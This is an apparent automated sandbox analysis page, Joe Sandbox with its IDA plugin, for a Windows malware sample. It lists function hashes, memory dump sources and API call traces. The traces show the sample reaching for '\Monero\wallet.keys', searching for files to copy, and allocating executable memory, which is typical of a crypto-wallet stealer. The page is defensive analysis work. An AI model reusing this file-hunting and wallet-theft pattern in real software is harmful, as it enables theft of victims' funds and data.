Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 19c86559d71dc6c56b65c110ffa15a676228cc790f29559707e26df2e450cce5
Instruction ID: 291e679469850607f5003620d74f493d4d4cdea969b2e4d8f4836a24a635063a
Opcode Fuzzy Hash: 19c86559d71dc6c56b65c110ffa15a676228cc790f29559707e26df2e450cce5
Instruction Fuzzy Hash: 5EE1ED729101189BEB48EBA8CC96DEE7338FF15300F444169F517E6991EF386A49CB63

Function 0089AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

lstrlen.KERNEL32(00000000), ref: 0089B16A
lstrlen.KERNEL32(00000000), ref: 0089B17E

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 1029f73555acb9edcb1176547c79d8ee146c6a47e4468757acc1a01968215e70
Instruction ID: 195de542f633c786fc6e420e16e3b3f27caa59a96485815616442bad043dfe61
Opcode Fuzzy Hash: 1029f73555acb9edcb1176547c79d8ee146c6a47e4468757acc1a01968215e70
Instruction Fuzzy Hash: 6891FE729101089BEF48EBA8DC95DEE7378FF15300F444169B517E6991EF386A09CBA3

Function 0089B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

lstrlen.KERNEL32(00000000), ref: 0089B42E
lstrlen.KERNEL32(00000000), ref: 0089B442

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 1b5bfde9f41e31a8ee57585749df0a2da4a7502e007026e8b2823ee2e4198423
Instruction ID: ad70cc0763dbd158a135676a8ae0a16c8355ebde77256d8d7533ee08bdabb2d0
Opcode Fuzzy Hash: 1b5bfde9f41e31a8ee57585749df0a2da4a7502e007026e8b2823ee2e4198423
Instruction Fuzzy Hash: C2711B719101089AEB48FBA8DD96DEE7378FF55300F444129B513E6991EF386A09CBA3

Function 008A4BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A4BEA
lstrcat.KERNEL32(?,0156D418), ref: 008A4C08

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A492C
Part of subcall function 008A4910: FindFirstFileA.KERNEL32(?,?), ref: 008A4943

Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FDC), ref: 008A4971
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FE0), ref: 008A4987
Part of subcall function 008A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008A4B7D
Part of subcall function 008A4910: FindClose.KERNEL32(000000FF), ref: 008A4B92

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A49B0
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B08D2), ref: 008A49C5
Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A49E2
Part of subcall function 008A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008A4A1E
Part of subcall function 008A4910: lstrcat.KERNEL32(?,0156E590), ref: 008A4A4A
Part of subcall function 008A4910: lstrcat.KERNEL32(?,008B0FF8), ref: 008A4A5C
Part of subcall function 008A4910: lstrcat.KERNEL32(?,?), ref: 008A4A70
Part of subcall function 008A4910: lstrcat.KERNEL32(?,008B0FFC), ref: 008A4A82
Part of subcall function 008A4910: lstrcat.KERNEL32(?,?), ref: 008A4A96
Part of subcall function 008A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008A4AAC
Part of subcall function 008A4910: DeleteFileA.KERNEL32(?), ref: 008A4B31

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A4A07

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 2d2ac6bf7f89ca143c7bc0e4c8bd75c75ab92458beea287493fc1cebcdd02bbf
Instruction ID: 3260180497b73a1d68b07b76ba2bda1d3ad4b0475a48ee5e12b2cfa08d9cebe4
Opcode Fuzzy Hash: 2d2ac6bf7f89ca143c7bc0e4c8bd75c75ab92458beea287493fc1cebcdd02bbf
Instruction Fuzzy Hash: DC41F7BB9001046BDB94F7A8EC46EEE333DF795300F008509B547D6685EE755B898BA3

Function 00896660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00896706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00896753

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 47b4538867593c7c65e31fac6a26e2024703f45249e8e3a7810c2afb6d433d8e
Instruction ID: ffb87c3417487683e16f69af57bb141ac2b3afce4d5123c8037d3ae015ae208c
Opcode Fuzzy Hash: 47b4538867593c7c65e31fac6a26e2024703f45249e8e3a7810c2afb6d433d8e
Instruction Fuzzy Hash: AB41D874A00209EFCB44DF98C494BADBBB1FF58314F2482A9E9599B345D731EA91CF84

Function 008A5050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A508A
lstrcat.KERNEL32(?,0156DAA0), ref: 008A50A8

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A492C
Part of subcall function 008A4910: FindFirstFileA.KERNEL32(?,?), ref: 008A4943

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 275038fa24845e8aaddc8c183247612f10ca817fc65fa04d4e1d5ad2c6d33c15
Instruction ID: 3a7978f84420f72361eae2cdafd26f54c5f5a14a511ba7c8a864ae7e9d6efe85
Opcode Fuzzy Hash: 275038fa24845e8aaddc8c183247612f10ca817fc65fa04d4e1d5ad2c6d33c15
Instruction Fuzzy Hash: AA01D676900208A7DB54FBB4DC46EEE333CFB65300F004545B64AD2591EE74AA89CBA3

Function 008910A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008910B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008910F7

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: a104f13cbb61699d83422e2c3bba818fb062e62dc570a949b53896f0ec08dfed
Instruction ID: 61b09bbe3cfea66cc7f242bd9e2c92c8db421b69421299ab30349b3c9e6f337a
Opcode Fuzzy Hash: a104f13cbb61699d83422e2c3bba818fb062e62dc570a949b53896f0ec08dfed
Instruction Fuzzy Hash: D2F0E271A41208BBEB14EAA8AC49FAFB7E8E705B15F300448F905E3280D5729E00DAA1

Function 008A8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00891B54,?,?,008B564C,?,?,008B0E1F), ref: 008A8D9F

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
